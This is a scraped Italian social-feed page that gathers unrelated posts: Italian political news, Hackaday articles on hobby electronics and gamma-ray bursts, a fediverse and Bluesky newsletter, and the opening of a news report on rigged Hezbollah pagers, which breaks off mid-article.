Salta al contenuto principale


Alessandro Di Battista al TPI Fest 2024: “Israele è il peggior stato terrorista al mondo”


@Politica interna, europea e internazionale
“Israele è il peggior stato terrorista al mondo”: lo dichiara senza troppi giri di parole Alessandro Di Battista al TPI Fest 2024, in programma per il terzo anno consecutivo presso la “Tettoia Nervi”, in piazza Lucio Dalla a Bologna. “Nel 2016 – afferma l’ex deputato del



Upgraded Raster Laser Projector Goes RGB


20300524

We’ve covered a scanning laser project by Ben Make’s Everything last year, and now he’s back with a significant update. [Ben]’s latest project now offers a higher resolution and RGB lasers. A couple of previous versions of the device used the same concept of a rotating segmented mirror synchronised to a pulsed laser diode to create scanlines. When projected onto a suitable surface, the distorted, pixelated characters looked quite funky, but there was clearly room for improvement.
20300526More scanlines and a faster horizontal pixel rate
The previous device used slightly inclined mirrors to deflect the beam into scanlines, with one mirror per scanline limiting the vertical resolution. To improve resolution, the mirrors were replaced with identically aligned mirrors of the type used in laser printers for horizontal scanning. An off-the-shelf laser galvo was used for vertical scanning, allowing faster scanning due to its small deflection angle. This setup is quicker than then usual vector galvo application, as the smaller movements require less time to complete. Once the resolution improvement was in hand, the controller upgrade to a Teensy 4 gave more processing bandwidth than the previous Arduino and a consequent massive improvement in image clarity.

Finally, monochrome displays don’t look anywhere near as good as an RGB setup. [Ben] utilised a dedicated RGB laser setup since he had trouble sourcing the appropriate dichroic mirrors to match available lasers. This used four lasers (with two red ones) and the correct dichroic mirrors to combine each laser source into a single beam path, which was then sent to the galvo. [Ben] tried to find a DAC solution fast enough to drive the lasers for a proper colour-mixing input but ended up shelving that idea for now and sticking with direct on-off control. This resulted in a palette of just seven colours, but that’s still a lot better than monochrome.

The project’s execution is excellent, and care was taken to make it operate outdoors with a battery. Even with appropriate safety measures, you don’t really want to play with high-intensity lasers around the house!

Here’s the previous version we covered, a neat DIY laser galvo using steppers, and a much older but very cool RGB vector projector.

youtube.com/embed/fEPicBSYeNQ?…

Thanks to [Chan] for the tip!


hackaday.com/2024/09/18/upgrad…



PODCAST GARAGEPUNK


iyezine.com/the-saint-and-allk…

@Musica Agorà



FLOSS Weekly Episode 801: JBang — Not Your Parents Java Anymore


20293934

This week Jonathan Bennett and Jeff Massie chat with Max Rydahl Andersen about JBang, the cross-platform tool to run Java as a system scripting language. That’s a bit harder than it sounds, particularly to take advantage of Java’s rich debugging capabilities and the ecosystem of libraries that are available. Tune in to get the details, as well as how polyglot files are instrumental to making JBang work!


youtube.com/embed/5qTyyMyU2hQ?…

Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


hackaday.com/2024/09/18/floss-…



Fediforum happened this week, mozilla.social shuts down, and Mastodon announces the Fediverse Discovery Project.


Last Week in Fediverse – ep 84

Welcome back to another update. Some short housekeeping notes: Last Week in Fediverse will now release every Wednesday. Furthermore, I’ve split all news about Bluesky and the ATmosphere into it’s own separate newsletter, Last Week in the ATmosphere. I originally wanted to keep them together, but the newsletters were simply getting too big, so it was time to split them. Lots of news this week with FediForum, a Fediverse Discovery Project, and mozilla.social shutting down, so lets dive in.

The news


The fourth edition of FediForum happened this week, a three-day unconference with speed demos of fediverse projects as well as some 40 open sessions about anything related to the fediverse. There were 14 demos, of which the video recordings should be available soon. Two demos stood out to me, showing products that have not been seen before, with Newsmast with channel.org, and Darius Kazemi’s ActivityPub Data Observatory. While there were lots of other great demos as well (Bandwagon for example), these mainly featured existing products.

Channel.org is the latest project by Newsmast, and is a way for organisations, nonprofits, and news publishers to build their own channel for outreach. It is fully connected to the fediverse with the front-end providing a clear and simplified interface that simply shows the latest posts by a channel. This can be seen with the demo Channel for the Kamala Harris Group, which recently got switched over to use Patchwork, Newsmast other fediverse project. Channel.org is based on Patchwork, which is a plug-in architecture that Mastodon server admins can run on top of their Mastodon server. Patchwork is getting close to being released, and Newsmast is currently looking for admins who are willing participate. Patchwork is free and publicly available, while Channel.org will require a paid membership and targets larger public organisations.

The ActivityPub Data Observatory allows fediverse developers to scan the structure (not the content!) of data that gets send around on the fediverse, allowing developers to easily compare how different sofware structures their ActivityPub data. For example, you can easily compare how Misskey structures the ActivityPub code of a note, versus how Mastodon sends the ActivityPub code for a note. The open-ended nature of ActivityPub allows developers to give their own spin on implementing ActivityPub

As for the sessions, one recurring theme I noted is the need and demand for spaces to discuss the governance and social side of the fediverse and fediverse developments. While there are spaces for the technical aspects of the discussion of the fediverse and the protocol with the SocialCG, the SocialHub and the Fediverse Developer Network, these communities are less accessible to the technical inclined people. This is a conversation that also has come up during previous FediForum sessions. The Fediverse Governance Report also notes a lack of formal channels for Federated Diplomacy. While the need and demand is clearly there, it seems to be hard to figure out a way to establish such communications channels in a way that also establishes them as legitimate places for discussions and diplomacy.

Another aspect that stood out to me is the lack of discussions that I noticed about Bluesky during FediForum, and what lessons can be learned that can be applied to the fediverse. Bluesky has managed to grow significantly bigger than the fediverse at this point, with around 5 times as many monthly active users, as well as onboarding the Brazilian community. It seems to me that it is worth reflecting on why that is, and how the fediverse can better show itself as a good, ethical social network that people would like to join.

Fediverse Discovery Providers


The organisation behind Mastodon (Mastodon gGmbH) has announced a new project, Fediscovery, that explores decentralised search and discovery for the fediverse. The project got funded by NGI Search, and “explores the possibilities for better search and discovery on the Fediverse in the form of an optional, pluggable service. This service should be decentralized, independent of any one specific Fediverse service and respect user choice and privacy.” Mastodon gGmbH is explicitly not building only for Mastodon, they make it clear that they intend Fediscovery to be used by the wider fediverse, not only Mastodon.

What Mastodon gGmbH is building here is what they call a ‘Fediverse Auxiliary Service Providers’. These auxiliary service providers can potentially do a variety of different services. The Fediscovery project is about building one of these service providers, a disovery provider, as a minimum proof of concept and as a demonstration what types of services other people can build as well. The plans are currently still in the very early stages, and more information expected at the end of September. For my own understanding I think of a Fediverse Auxiliary Service Provider as pretty much a Relay, with some minor yet-to-be-announced differences.

Mastodon gGmbH is also explicit in focusing on opt-in consent for the service, stating that it will “only ingest content from creators who opted in to discovery in the first place. Instances sending content to discovery providers should make sure to only send such content in the first place as well. All other information a discovery provider gathers should be anonymous.”

During a FediForum session about Fediscovery, Mastodon CTO Renaud Chaput confirmed that between 8% and 10% of active accounts have opted into Mastodon’s search, a year after it has been released. It indicates one of the fundamental challenges of any design that is opt-in: very few people will change the default settings, irregardless of what the settings are about. As Discovery and Search systems gain value by covering a bigger network, it shows the fundamental tensions that Mastodon gGmbH will have to grapple with while building Fediscovery.

Mozilla shuts down mozilla.social fediverse server


Mozilla has announced that they will shut down the mozilla.social server in December 2024. The server was announced in December 2022 as a way to ‘explore healthy social media alternative’. The project was originally quite big in scope, with planned integrations to log in with Firefox, and the GitHub repo showed their own mobile clients, and a custom front-end based on Elk. In 2023 Mozilla started to very slowly open up in a private beta, but the number of people getting access has been low. In February 2024 Mozilla downsizes as it refocuses on Firefox, scaling back their investments in various products, including their mozilla.social fediverse server. In an accompanying memo Mozilla stated at the time: “The actions we’re taking today will make this strategic correction, working through a much smaller team to participate in the Mastodon ecosystem and more rapidly bring smaller experiments to people that choose to live on the mozilla.social instance.”

It seems like these more rapid smaller experiments never came, nor did it seem that Mozilla was particularly interested in growing the server. I honestly cannot find out if the server ever opened up for open registrations after they ran a waitlist for a long time, but it seems like it they have not. At any rate, the experiment stayed small, and mozilla.social currently has just below 300 active users.

The shutdown of Mozilla.social does raise questions about the server-centric model that the fediverse is based around: are there organisations that are willing to run large general-purpose fediverse servers, and have the ability to handle the infrastructure costs and moderation requirements that come with it. Mozilla seemed like it would be a good organisation to potentially do that. With Mozilla now pulling back, focusing on smaller servers might be a more logical direction going forward.

In Other News


  • Threads has figured out how maximise publicity by making minimal incremental updates to their ActivityPub implementation, edition 501.
  • Threaded is a Mastodon client that advertised a ‘Threads-like’ interface. Meta got in touch and threatened legal action, and now the app is renamed to Bubble.
  • Bonfire showcases how with third-party extensions scientists can display ‘relevant data about their work and research topics directly on their profiles.’ Bonfire does not yet know when the platform will launch.
  • The client Kaiteki, which focused on being a client for all the different microblogging platforms in the fediverse, stops development.
  • The German Federal Ministry of Education and Research had stopped using their Mastodon account in October 2023, and after not posting for most of the year they said they’d close the account. After a large pushback from the community they reconsidered the decision and said they’d continue using the account again.
  • Mastodon’s new author byline feature is now available for everyone.
  • Goblin is an Tumblr-like platform for the fediverse, that recently opened up for signups. Someone also made a Cohost user style.
  • The new Trust and Safety Taskforce with the SocialCG has set up an issue tracker for protocol level and/or specification changes to improve trust and safety on the fediverse.
  • mastodon adoptions article link.springer.com/article/10.1…
  • The Fediverse Berlin Day had multiple sessions about, well, the fediverse. Full live stream available here, with the German publisher ARD talking about their fediverse experience and strategy. Evan Prodromou also gave a talk about a ‘bigger, better fediverse’, which you can watch here. I do want to note that I find it very hard to square Prodromou’s estimation of 10 million federated Threads account with the fact that Mastodon.social (which accounts for a quarter of the entire fediverse’ monthly active users) currently knows about 18000 federated Threads accounts.


The Links


That’s all for this week. You can also check out my post with the weekly news on atproto here.

#fediverse

fediversereport.com/last-week-…





Bluesky adds video support, announces 10 million accounts, and more!


Last Week in the ATmosphere

Welcome to the weekly update on everything that’s happened on Bluesky and the broader network called the ATmosphere. A short introduction for people who might not know me: I’m Laurens Hof, and the last year I’ve written a monthly update on all the news that’s happened on Bluesky. I’ve written a weekly newsletter about everything that is happening in the fediverse, the other decentralised social network, as well over the last year and a half. And now you can expect even more regular updates on Bluesky and the ATmosphere as well, coming out every Wednesday. It’s been a busy week* with video, 10 million accounts, and more!

The News


Bluesky has added support for video. The feature has been often requested, especially from the Brazilian community. Over the last few weeks the team has made it their top priority to launch the feature as soon as possible. Videos have indeed been very popular on Bluesky, with 169 years of videos being served within 2 days, and half a million videos posted within 4 days. Each video can be one minute long, and people can upload 25 videos per day.

There are two things that stand out to me about Bluesky’s video support: videos have shown to be highly popular on Bluesky, and the openness of the ATmosphere network allows people to build new types of network that are more catered towards watching videos specifically. I’m curious to what extend this will actually happen. Furthermore videos require significantly more resources than text posts, so it is worth watching how this impacts Blueskys thinking about costs and monetization.


Bluesky crossed 10 million accounts this week, of which around 4 million came in the last month or so after the ban in Brazil on X. It now has around 5.5 million monthly active users. User retention after this new signup wave is also notably high, with daily active users peaking at 1.91 million, and staying at 1.57 million some two weeks later. Every signup wave has a significant amount of churn, as it is very difficult to get people to change their habits and start regularly using a new social platform, and Bluesky’s churn seems low to me. Bluesky celebrated this milestone by letting everyone know which number they joined the network with, and how early they were. The amount of people sharing it shows that people on Bluesky definitely like to show off their early-adopter status.


The adoption of Bluesky by the Brazilian community as the default social network after the ban on X has continued. After the dust has settled it looks like the Brazilians now fairly consistently represent three quarters of the total posts on the network. President Lula (‘s social media team) shows that they’re aware of the features that Bluesky offers, and has used a Starter Pack to promote different candidates for elections. Some of the biggest football clubs in Brazil have established an official presence as well, such as Corinthians and Vasco da Gama. When goals get scored during the games, this is now clearly visible in significant spikes in posts, with the number of posts per second doubling temporarily. Another developer made a directory of Brazilian accounts on Bluesky, sorted by various categories, to help people onboard as well. A Brazilian esports organisation now sells handles with their (sub)domain to raise money for the organisation as well as for people to show they support the team.

The Brazilian Bluesky community also had their first major cultural moment this week. During a televised debate between electoral rivals for mayor of Sao Paolo, one of the candidates hit one of the other candidates with a chair. Videos of the event went viral, and over the last two days the majority of the network’s top posts have been memes about the event. One of the most popular posts described it as ‘a really canonical event on this social network’. This is also in contrast with Threads, where the event seems to have not gone viral at all.


Skyware is a new lightweight labeler server. Originally, the labeling system was designed by Bluesky to be a content moderation system. Over time, the labeling system has slowly transformed, away from content moderation, and towards labelers that you can self-apply for silly or more practical use-cases as indicating your pronouns (or to recreate Orkut). Skyware is the next evolution in this, where the software is only for labeling accounts, and the moderation part of the system is stripped away altogether. Still, other organisations are experimenting with using labelers for content moderation: News Detective is a fact checking organisation that now has a labeler on Bluesky as well. How effective a fact-checking system is when people have to opt into receiving the fact checks on a social network remains to be seen however.

In other news


  • The third Tech Talk by the (unaffiliated) atprotocol.dev community is by Ændra Rininsland, who is behind the labeler XBlock and the News feed.
  • A research paper that studies how Bluesky has evolved from invitation-only to being open to the public. One of their findings is that Bluesky is a chatty network, something that was already the case before the arrival of the Brazilians: users tend to create more posts than reshare other posts, in contrast with Twitter/X where the dynamic is the other way around.
  • For the people interested in the nitty-gritty of protocols: NodeInfo is a standardized way of exposing metadata about a server running one of the distributed social networks, and it is currently mainly used for ActivityPub servers. Now there is an effort to expand NodeInfo so it can also be used for a PDS on atproto.
  • Bridgy Fed is a way to connect Bluesky to other decentralised social networks such as Mastodon. The latest update now also bridges video between the network, and you can let the bridge ask an account via a DM if they want to opt-in to the bridge. Bridgy Fed will only send a DM once, even if someone else also asks.
  • Graphtracks allows you to check the statistics of atproto accounts, allowing you to see a graph of your follow and likes over time. It shows the power of a completely open API, where anyone can now have full detailed statistics about their account.

That’s all for this week, thanks for reading! You can subscribe to my newsletter to receive the weekly updates directly in your inbox below, and follow me on Bluesky @laurenshof.online.

* 10 days actually, I switched from publishing on Sunday to publishing on Wednesday this week as well.

#bluesky

fediversereport.com/last-week-…




Onu a Israele: stop a presenza illegale nei Territori palestinesi entro 12 mesi


@Notizie dall'Italia e dal mondo
La risoluzione ha ricevuto 124 voti favorevoli, 43 paesi si sono astenuti, Israele, gli Usa e altri 12 Stati hanno votato contro. L’Italia si è astenuta
L'articolo Onu a Israele: stop a presenza illegale nei Territori palestinesi entro 12 mesi



Riceviamo e pubblichiamo da Leonardo Cribio
🌍 TRE GIORNI PER LA PACE 2024 🌍
"Assange e Guerra al giornalismo"

🎤 Dibattito con i giornalisti:

Germana Leoni

Fabrizio Cassinelli

Giuliano Marrucci

Massimo Alberizzi

Alberto Negri (in collegamento)…



Commission ends probe of Microsoft-Inflection AI merger


The European Commission will stop looking into whether Microsoft's hiring of Inflection AI staff breached EU merger rules after seven EU countries dropped their requests for an investigation, the EU executive said in a press release on Wednesday (18 September).


euractiv.com/section/competiti…



Meet the Winners of the 2024 Tiny Games Contest


20284971

Over the years, we’ve figured out some pretty sure-fire ways to get hackers and makers motivated for contests. One of the best ways is to put arbitrary limits on different aspects of the project, such as how large it can be or how many power it can consume. Don’t believe us? Then just take a look at the entries of this year’s Tiny Games Contest.

Nearly 80 projects made it across the finish line this time, and our panel of judges have spent the last week or so going over each one to try and narrow it down to a handful of winners. We’ll start things off with the top three projects, each of which will be awarded a $150 gift certificate from our friends at DigiKey.

First: Sub-Surface Simon


20284973

While this contest saw a lot of excellent entries, we don’t think anyone is going to be surprised to see this one take the top spot. Earning an exceptionally rare perfect ten score from each of our judges, Sub-Surface Simon from [alnwlsn] grabbed onto the theme of this contest and ran like hell with it.

Exploiting the fact that many integrated circuits are actually far smaller than their external packages, [alnwlsn] milled away the inert plastic surrounding the DIP-14 version of the ATtiny84A, which left just enough room to install some LEDs and buttons. This means the complete game is housed within the boundaries of the chip itself — just plug it into a powered breadboard and get playing.

Second: Morse Quest


20284976

Coming in at second place is Morse Quest, from [felix]. Basically, [felix] took the classic text-based adventure game formula, and replaced the keyboard and monitor with a microswitch and an LED. Players not only need to correctly decode the flashing LED to figure out what the game is saying about their immediate environment, but they have to compose their response and key it in manually.

Always wanted to learn Morse code, but didn’t know how to get started? Well, this game probably isn’t it. While you can select the rate at which the same blinks out the game to make things a little easier on yourself, you’ll still need a pretty solid knowledge of Morse to explore very far.

Third: WS2812B Othello


20284978

Easily the most traditional game of the of the top three, this handheld Othello allows the player to challenge a computerized opponent on an 8×8 matrix of WS2812B LEDs. As the LED board is an off-the-shelf module, [Dave] was able to hide most of the main PCB’s electronics underneath it, giving the overall device a particularly clean look.

As nice as the hardware is, the software is equally impressive. Running on an 80 MHz STM32L412KBT6, [Dave] wrote the entire firmware without using any external libraries. Most of us would have been reaching for a common library just to get the hardware working, but he wrote everything from the button debounce routines to the actual logic by which the game is played.

Honorable Mentions


There’s no way we can pick just three of these incredible projects to showcase, so as usual, we have a few additional categories for entries that really stood out to the judges.

One Dimensional: For this category we wanted to get people thinking about what they could do with a common addressable LED strip, and T1Duino from [Andrea Trentini] didn’t disappoint. This large-format game re-imagines Tetris in a single dimension by focusing on the colors of the falling blocks instead of their shapes. But we’ve also got to give credit to [senily64dx], who really thumbed their nose at this one. Zero Dimensional PONG recreates the classic game with just a single LED. The players are meant to interpret the changing brightness of the LED as it moving closer or farther away from them, and time their button presses accordingly.

The Classics: This category was devoted to entries that brought back the iconic games of yesteryear, so it’s little surprise that the judges singled out this miniature Space Invaders arcade cabinet from [Nick Cranch] as a prime example. Just one classic game not enough? Then take a look at the μRetro from [bobricius]. This gorgeous handheld uses ATtiny85 cartridges that let’s you swap between a collection of arcade standards.

The Controls: Nintendo has spent the last couple of decades proving that how players interact with the hardware can be just as important as the games themselves, and these entries are no different. Salsa ONE by [Alex] is a minimalistic handheld that you play with just a single button, while Blind Maze from [penumbriel] tasks the player with navigating an invisible maze using an interface consisting of a trio of buttons and LEDs.

Pocket Arcade: Each judge agreed that, as far as being pocket-friendly, the Wibraboy was the project to beat. By repurposing the enclosure from a cheapo handheld game, [x3e] was able to give their DIY recreation a remarkably professional look. For those with even smaller pockets, the Tiny OLED by [deʃhipu] offers up classic gameplay in an exceptionally small footprint.

Fancy!: Finally, this category was devoted to the most polished and professional looking builds. Among all the projects, the LED Matrix Arcade from [Ryan Shill] may be the most attractive of the bunch. With its vibrant 32×32 LED array and walnut enclosure, it’s a build we’d be proud to have on display at home. The all-digital Mini Virtual Pinball Cabinet created by [mircemk] was also a favorite for this category, as it does an excellent job of recreating the authentic pinball look with a sideways-mounted 17 inch monitor.
2028498020284982202849842028498620284988

Shall We Play a Game?


There’s only so many projects we can call out individually, so we strongly recommend you head over to Hackaday.io and browse all of the incredible entries into this contest. There’s some truly impressive work in there, and we’re willing to bet you’ll find something in there that will help inspire your own projects.

We’d like to thank DigiKey for helping to make this contest possible, and of course the Hackaday community for consistently rising to our latest challenge. Speaking of which, you’ve still got some time before the deadline to submit your best Simple Supercon Add-On for our latest contest.

2024 Tiny Games Challenge



Underwater high-tech. Fincantieri lancia il nuovo simulatore a realtà aumentata

@Notizie dall'Italia e dal mondo

[quote]Cetena, società del gruppo Fincantieri, leader nella ricerca e simulazione navale, ha sviluppato il primo simulatore avanzato che combina realtà virtuale e aumentata per la guida e la manutenzione di veicoli subacquei filoguidati (Remotely operated vehicles – Rov), destinati




Oggi il Ministro Giuseppe Valditara ha firmato il decreto a favore di 19 nuove Fondazioni #ITSAcademy, che nel 2023 hanno avviato almeno un percorso formativo. Grazie al provvedimento riceveranno oltre 55 milioni di euro.


Airline Seats Are for Dummies


20278870

You normally don’t think a lot would go into the construction of a chair. However, when that chair is attached to a commercial jet plane, there’s a lot of technology that goes into making sure they are safe. According to a recent BBC article, testing involves crash dummies and robot arms.

Admittedly, these are first-class and business-class seats. Robots do repetitive mundane tasks like opening and closing the tray table many, many times. They also shoot the seats with crash dummies aboard at up to 16 Gs of acceleration. Just to put that into perspective, a jet pilot ejecting gets about the same amount of force. A MiG-35 pilot might experience 10 G.

We didn’t realize how big the airline seat industry is in Northern Ireland. Thompson, the company that has the lab in question, is only one of the companies in the country that builds seats. Apparently, the industry suffered from the global travel slowdown during the pandemic but is now bouncing back.

While people worry about robots taking jobs, we can’t imagine anyone wanting to spend all day returning their tray table to the upright and locked position repeatedly. We certainly don’t want to be 16 G crash dummies, either.

Crash dummies have a long history, of course. Be glad airliners don’t feature ejector seats.


hackaday.com/2024/09/18/airlin…



M5S, pubblicati i 20 possibili temi della costituente: ci sono anche nome, simbolo e limite due mandati


@Politica interna, europea e internazionale
Sul sito del Movimento 5 Stelle è stato pubblicato l’elenco dei 20 temi che potrebbero essere discussi nell’assemblea costituente in programma a ottobre. Di questi, solo 12 saranno effettivamente oggetto di approfondimento. A selezionarli saranno, nei prossimi giorni,



Lustery, a site for consent-based homemade porn, has added a new clause to its contract promising not to replace human performers with AI without consent.#News
#News


Guerra di tecnologie. Droni, missili e AI nel conflitto in Medio Oriente

@Notizie dall'Italia e dal mondo

[quote]Il Medio Oriente dilaniato dalla guerra è divenuto, suo malgrado, una vetrina per l’uso di nuove tecnologie militari da parte di tutti gli attori coinvolti. Difatti non solo le Israeli Defence Forces, storicamente caratterizzate dall’impiego di tecnologie all’avanguardia nel tentativo di sopperire alle



Multiple LinkedIn users on Wednesday noticed a setting that showed LinkedIn was using user data to improve its generative AI. LinkedIn told 404 Media it will update its terms of service “shortly.”#News
#News


Catching The BOAT: Gamma-Ray Bursts and The Brightest of All Time


20271299

Down here at the bottom of our ocean of air, it’s easy to get complacent about the hazards our universe presents. We feel safe from the dangers of the vacuum of space, where radiation sizzles and rocks whizz around. In the same way that a catfish doesn’t much care what’s going on above the surface of his pond, so too are we content that our atmosphere will deflect, absorb, or incinerate just about anything that space throws our way.

Or will it? We all know that there are things out there in the solar system that are more than capable of wiping us out, and every day holds a non-zero chance that we’ll take the same ride the dinosaurs took 65 million years ago. But if that’s not enough to get you going, now we have to worry about gamma-ray bursts, searing blasts of energy crossing half the universe to arrive here and dump unimaginable amounts of energy on us, enough to not only be measurable by sensitive instruments in space but also to effect systems here on the ground, and in some cases, to physically alter our atmosphere.

Gamma-ray bursts are equal parts fascinating physics and terrifying science fiction. Here’s a look at the science behind them and the engineering that goes into detecting and studying them.

Collapsars and Neutron Stars


Although we now know that gamma-ray bursts are relatively common, it wasn’t all that long ago that we were ignorant of their existence, thanks in part to our thick, protective atmosphere. The discovery of GRBs had to wait for the Space Race to couple with Cold War paranoia, which resulted in Project Vela, a series of early US Air Force satellites designed in part to watch for Soviet compliance with the Partial Test Ban Treaty, which forbade everything except underground nuclear tests. In 1967, gamma ray detectors on satellites Vela 3 and Vela 4 saw a flash of gamma radiation that didn’t match the signature of any known nuclear weapon. Analysis of the data from these and subsequent flashes revealed that they came from space, and the race to understand these energetic cosmic outbursts was on.
20271301Trust, but verify. Vela 4, designed to monitor Soviet nuclear testing, was among the first satellites to detect cosmic gamma-ray bursts. Source: ENERGY.GOV, Public domain, via Wikimedia Commons
Gamma-ray bursts are the most energetic phenomena known, with energies that are almost unfathomable. Their extreme brightness, primarily as gamma rays but across the spectrum and including visible light, makes them some of the most distant objects ever observed. To put their energetic nature into perspective, a GRB in 2008, dubbed GRB 080319B, was bright enough in the visible part of the spectrum to just be visible to the naked eye even though it was 7.5 billion light years away. That’s more than halfway across the observable universe, 3,000 times farther away than the Andromeda galaxy, normally the farthest naked-eye visible object.

For all their energy, GRBs tend to be very short-lived. GRBs break down into two rough groups. Short GRBs last for less than about two seconds, with everything else falling into the long GRB category. About 70% of GRBs we see fall into the long category, but that might be due to the fact that the short bursts are harder to see. It could also be that the events that precipitate the long variety, hypernovae, or the collapse of extremely massive stars and the subsequent formation of rapidly spinning black holes, greatly outnumber the progenitor event for the short category of GRBs, which is the merging of binary neutron stars locked in a terminal death spiral.

The trouble is, the math doesn’t work out; neither of these mind-bogglingly energetic events could create a burst of gamma rays bright enough to be observed across half the universe. The light from such a collapse would spread out evenly in all directions, and the tyranny of the inverse square law would attenuate the signal into the background long before it reached us. Unless, of course, the gamma rays were somehow collimated. The current thinking is that a disk of rapidly spinning material called an accretion disk develops outside the hypernova or the neutron star merger. The magnetic field of this matter is tortured and twisted by its rapid rotation, with magnetic lines of flux getting tangled and torn until they break. This releases all the energy of the hypernova or neutron star merger in the form of gamma rays in two tightly focused jets aligned with the pole of rotation of the accretion disk. And if one of those two jets happens to be pointed our way, we’ll see the resulting GRB.

youtube.com/embed/rofLQgMxM78?…

Crystals and Shadows


But how exactly do we detect gamma-ray bursts? The first trick is to get to space, or at least above the bulk of the atmosphere. Our atmosphere does a fantastic job shielding us from all forms of cosmic radiation, which is why the field of gamma-ray astronomy in general and the discovery of GRBs in particular had to wait until the 1960s. A substantial number of GRBs have been detected by gamma-ray detectors carried aloft on high-altitude balloons, especially in the early days, but most dedicated GRB observatories are now satellite-borne

Gamma-ray detection technology has advanced considerably since the days of Vela, but a lot of the tried and true technology is still used today. Scintillation detectors, for example, use crystals that release photons of visible light when gamma rays of a specific energy pass through them. The photons can then be amplified by photomultiplier tubes, resulting in a pulse of current proportional to the energy of the incident gamma ray. This is the technology used by the Gamma-ray Burst Monitor (GBM) aboard the Fermi Gamma-Ray Space Telescope, a satellite that was launched in 2008. Sensors with the GBT are mounted around the main chassis of Fermi, giving it a complete very of the sky. It consists of twelve sodium iodide detectors, each of which is directly coupled to a 12.7-cm diameter photomultiplier tube. Two additional sensors are made from cylindrical bismuth germanate scintillators, each of which is sandwiched between two photomultipliers. Together, the fourteen sensors cover from 8 keV to 30 MeV, and used in concert they can tell where in the sky a gamma-ray burst has occurred.
20271303The coded aperture for Swift’s BAT. Each tiny lead square casts a unique shadow pattern on the array of cadmiun-zinc-telluride (CZT) ionization sensors, allowing an algorithm to work out the characteristics of the gamma rays falling on it. Source: NASA.
Ionization methods are also used as gamma-ray detectors. The Niel Gehrels Swift Observatory, a dedicated GRB hunting satellite that was launched in 2004, has an instrument known as the Burst Alert Telescope, or BAT. This instrument has a very large field of view and is intended to monitor a huge swath of sky. It uses 32,768 cadmium-zinc-telluride (CZT) detector elements, each 4 x 4 x 2 mm, to directly detect the passage of gamma rays. CZT is a direct-bandgap semiconductor in which electron-hole pairs are formed across an electric field when hit by ionizing radiation, producing a current pulse. The CZT array sits behind a fan-shaped coded aperture, which has thousands of thin lead tiles arranged in an array that looks a little like a QR code. Gamma rays hit the coded aperture first, casting a pattern on the CZT array below. The pattern is used to reconstruct the original properties of the radiation beam mathematically, since conventional mirrors and lenses don’t work with gamma radiation. The BAT is used to rapidly detect the location of a GRB and to determine if it’s something worth looking at. If it is, it rapidly slews the spacecraft to look at the burst with its other instruments and instantly informs other gamma observatories about the source so they can take a look too.

The B.O.A.T.


On October 9, 2022, both Swift and Fermi, along with dozens of other spacecraft and even some ground observatories, would get to witness a cataclysmically powerful gamma-ray burst. Bloodlessly named GRB 221009A but later dubbed “The BOAT,” for “brightest of all time,” the initial GRB lasted for an incredible ten minutes with a signal that remained detectable for hours. Coming from the direction of the constellation Sagittarius from a distance of 2.4 billion light years, the burst was powerful enough to saturate Fermi’s sensors and was ten times more powerful than any signal yet received by Swift.
20271305The BOAT. A ten-hour time-lapse of data from the Fermi Large Area Telescope during GRB 221009A on October 8, 2022. Source: NASA/DOE/Fermi LAT Collaboration, Public domain
Almost everything about the BOAT is fascinating, and the superlatives are too many to list. The gamma-ray burst was so powerful that it showed up in the scientific data of spacecraft that aren’t even equipped with gamma-ray detectors, including orbiters at Mars and Voyager 1. Ground-based observatories noted the burst, too, with observatories in Russia and China noting very high-energy photons in the range of tens to hundreds of TeV arriving at their detectors.

The total energy released by GRB 221009A is hard to gauge with precision, mainly because it swamped the very instruments designed to measure it. Estimates range from 1048 to 1050 joules, either of which dwarfs the total output of the Sun over its entire 10 billion-year lifespan. So much energy was thrown in our direction in such a short timespan that even our own atmosphere was impacted. Lightning detectors in India and Germany were triggered by the burst, and the ionosphere suddenly started behaving as if a small solar flare had just occurred. Most surprising was that the ionospheric effects showed up on the daylight side of the Earth, swamping the usual dampening effect of the Sun.

When the dust had settled from the initial detection of GRB 221009A, the question remained: What happened to cause such an outburst? To answer that, the James Webb Space Telescope was tasked with peering into space, off in the direction of Sagittarius, where it found pretty much what was expected — the remains of a massive supernova. In fact, the supernova that spawned this GRB doesn’t appear to have been particularly special when compared to other supernovae from similarly massive stars, which leaves the question of how the BOAT got to be so powerful.

Does any of this mean that a gamma-ray burst is going to ablate our atmosphere and wipe us out next week? Probably not, and given that this recent outburst was estimated to be a one-in-10,000-year event, we’re probably good for a while. It seems likely that there’s plenty that we don’t yet understand about GRBs, and that the data from GRB 221009A will be pored over for decades to come. It could be that we just got lucky this time, both in that we were in the right place at the right time to see the BOAT, and that it didn’t incinerate us in the process. But given that on average we see one GRB per day somewhere in the sky, chances are good that we’ll have plenty of opportunities to study these remarkable events.


hackaday.com/2024/09/18/catchi…



Dal supercalcolo ai velivoli del futuro, Montrucchio spiega il cuore tecnologico di Leonardo a Torino

@Notizie dall'Italia e dal mondo

[quote]La digitalizzazione sta ridefinendo l’industria aerospaziale. Nuovi processi e strumenti, potenziati dall’intelligenza artificiale e dal supercalcolo, stanno rivoluzionando la progettazione e lo sviluppo dei velivoli moderni. In questa evoluzione, accelerata dagli



La lettera di Marina Berlusconi: “Basta con i falsi retroscena, nessuna trama contro Meloni”


@Politica interna, europea e internazionale
Marina Berlusconi smentisce pubblicamente presunte cospirazioni da parte della sua famiglia contro la presidente del Consiglio Giorgia Meloni. E nega anche che gli eredi del Cavaliere siano insoddisfatti di come Antonio Tajani sta guidando Forza Italia. La



Supply Chain del Terrore! I Cercapersone Manomessi in fase di Produzione e Spedizione


Da ieri, la percezione degli attacchi alla supply chain è cambiata radicalmente.

Non si tratta più solo di proteggere i dati, ma di garantire la sicurezza fisica delle persone. Gli eventi di ieri hanno evidenziato come la manipolazione dei dispositivi possa mettere a rischio la vita umana, trasformando la tecnologia in un’arma silenziosa e invisibile. Questo ci fa comprendere come la sicurezza informatica e quella fisica siano ora profondamente interconnesse, e il prezzo dell’inazione non è più solo la perdita di informazioni, ma la perdita di vite umane

Da quanto è stato riportato da alcuni media, all’interno dei dispositivi esplosi agli Hezbollah, sono state impiantate delle schede con dell’esplosivo in fase di produzione.

La vicenda rappresenta uno degli attacchi più significativi in termini di penetrazione delle reti di comunicazione di Hezbollah, e ha sollevato numerosi interrogativi sulla vulnerabilità delle forniture elettroniche destinate a gruppi militanti.

Manomissioni in fase di produzione


